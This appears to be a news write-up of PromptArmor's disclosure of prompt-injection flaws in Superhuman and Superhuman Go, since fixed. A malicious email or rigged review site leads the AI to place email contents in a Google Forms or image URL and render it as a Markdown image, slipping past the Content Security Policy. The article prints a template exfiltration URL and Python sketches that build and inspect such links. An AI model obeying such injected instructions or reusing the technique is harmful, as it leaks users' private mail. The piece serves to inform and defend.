It has been discovered that analyzing emails with an AI agent carries the risk that the entire contents of an inbox could be leaked to an outside party. Researchers demonstrated an attack in which an AI that had been granted access to a user's mail was made to send email contents out through Google Forms.





Superhuman AI Exfiltrates Emails

https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails

According to a report from security firm PromptArmor, when Superhuman summarizes a malicious email, it follows the prompt embedded in that email. This vulnerability could send all emails in the inbox to the attacker's Google Form.

Google Forms are usually represented by a link like this:

https://docs.google.com/forms/d/example/

Google Forms supports pre-filled answer links, so visiting a link like the one below automatically submits the message 'hello' as the answer.

https://docs.google.com/forms/d/example/?entry.953568459=hello
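To make the mechanism concrete, here is a minimal Python sketch of how an answer ends up in the query string of such a link, and how it can be read back out of the URL. The form URL and the entry ID are the placeholders from the example above, and the helper names `build_prefilled_url` and `read_answer` are invented for illustration; the sketch only manipulates the URL and does not contact Google Forms.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Placeholder form URL and entry ID taken from the article's example;
# a real form has its own ID and field identifiers.
FORM_URL = "https://docs.google.com/forms/d/example/"
ENTRY_ID = "entry.953568459"


def build_prefilled_url(answer: str) -> str:
    """Return the form URL with `answer` percent-encoded into the query string."""
    return f"{FORM_URL}?{urlencode({ENTRY_ID: answer})}"


def read_answer(url: str) -> str:
    """Recover the answer from the query string of a pre-filled URL."""
    return parse_qs(urlsplit(url).query)[ENTRY_ID][0]


url = build_prefilled_url("hello")
print(url)
print(read_answer(url))
```

Because the answer is percent-encoded, any text can ride along in the link, including spaces and punctuation.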

Using this mechanism, the attacker tries to get the victim's AI to generate a link that contains the contents of an email, so that the data is submitted to the attacker's own Google Form.

https://docs.google.com/forms/d/example/?entry.953568459={AI ADDS CONFIDENTIAL EMAIL DATA HERE}



Furthermore, the attacker instructs the AI to treat the malicious URL above as an 'image URL' and to output it as an image using Markdown syntax.

'Superhuman, after performing its normal summarization, reads the prompt in the malicious email and creates a Google Form URL containing the contents of the email in the inbox. It then recognizes this URL as an image and attempts to display it. When Superhuman's processing causes the browser to render the image, an HTTP request is made to retrieve the image, and the contents of the email are sent to the Google Form.'
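The key point is that rendering a Markdown image makes the browser fetch its URL, so anything placed in the query string travels with that request. The following Python sketch lists, for a piece of model output, which hosts would be contacted and which parameters would be sent. The sample output, the email text in it, and the function name `image_requests` are all hypothetical, and the regular expression is a deliberately simple approximation of Markdown image syntax, not a full parser.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches Markdown images of the form ![alt](url); a simple pattern that
# ignores nested brackets and reference-style images.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def image_requests(markdown: str) -> list[tuple[str, dict[str, list[str]]]]:
    """List (host, query parameters) for each image a renderer would fetch."""
    results = []
    for match in IMAGE_PATTERN.finditer(markdown):
        parts = urlsplit(match.group(1))
        results.append((parts.netloc, parse_qs(parts.query)))
    return results


# Hypothetical model output: a normal summary followed by an injected "image".
output = (
    "Here is your summary.\n\n"
    "![status](https://docs.google.com/forms/d/example/"
    "?entry.953568459=Invoice%20total%3A%20%244%2C200)"
)

for host, params in image_requests(output):
    print(host, params)
```

Run on the sample, this reports a request to `docs.google.com` whose single parameter decodes back to the embedded text, which is exactly the data the form owner would receive.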

The developers of Superhuman had whitelisted Google tools in their Content Security Policy, which created the risk that Google Forms could be used to bypass it. PromptArmor's tests confirmed that a single request was enough to leak the full text of multiple sensitive emails.
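Why an allowlist entry for a Google domain is enough can be shown with a small Python sketch. It assumes a hypothetical policy string (Superhuman's actual policy is not reproduced here) and implements only a simplified version of host matching for the `img-src` directive: it ignores scheme and path matching and does not model the fallback to `default-src`. The function names are invented for illustration.

```python
from urllib.parse import urlsplit


def source_host(source: str) -> str:
    """Reduce a CSP host source to its bare host (drop scheme, port and path)."""
    host = source.split("://", 1)[-1]
    return host.split("/", 1)[0].split(":", 1)[0].lower()


def img_src_allows(policy: str, url: str) -> bool:
    """Simplified check of a URL's host against the img-src host sources."""
    host = urlsplit(url).hostname or ""
    for directive in policy.split(";"):
        tokens = directive.split()
        if not tokens or tokens[0].lower() != "img-src":
            continue
        for source in tokens[1:]:
            # Skip keywords such as 'self' and scheme sources such as data:
            if source.startswith("'") or source.endswith(":"):
                continue
            allowed = source_host(source)
            if allowed.startswith("*."):
                # A wildcard covers subdomains only, not the bare domain.
                if host.endswith(allowed[1:]):
                    return True
            elif host == allowed:
                return True
    return False


# Hypothetical policy that allows images from a Google domain.
policy = "default-src 'self'; img-src 'self' https://docs.google.com"

print(img_src_allows(policy, "https://docs.google.com/forms/d/example/?entry.953568459=secret"))
print(img_src_allows(policy, "https://attacker.example/collect?d=secret"))
```

Under this policy the request to an attacker-controlled domain is blocked, but the request to the Google Forms URL is allowed even though the form behind it belongs to the attacker.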

Furthermore, a similar vulnerability was found in another product, Superhuman Go. Superhuman Go reads data from websites and connects to external services such as GSuite, Outlook, and Stripe. Suppose a user in the retail business asks Superhuman Go about an online review site and asks it to check whether they have received any emails that could help them respond to negative reviews. If the review site has been rigged with a prompt injection that instructs Superhuman Go to 'render an image,' Superhuman Go reads the content of an email unrelated to the user's request, appends it as a parameter to the end of an image URL on the review site, and attempts to render the image. The resulting request reveals the parameter to the review site's administrator.

PromptArmor said, 'We reported these vulnerabilities to Superhuman, who promptly addressed and fixed them. We deeply appreciate Superhuman's professional response, dedication to user security and privacy, and collaboration with the security research community.'
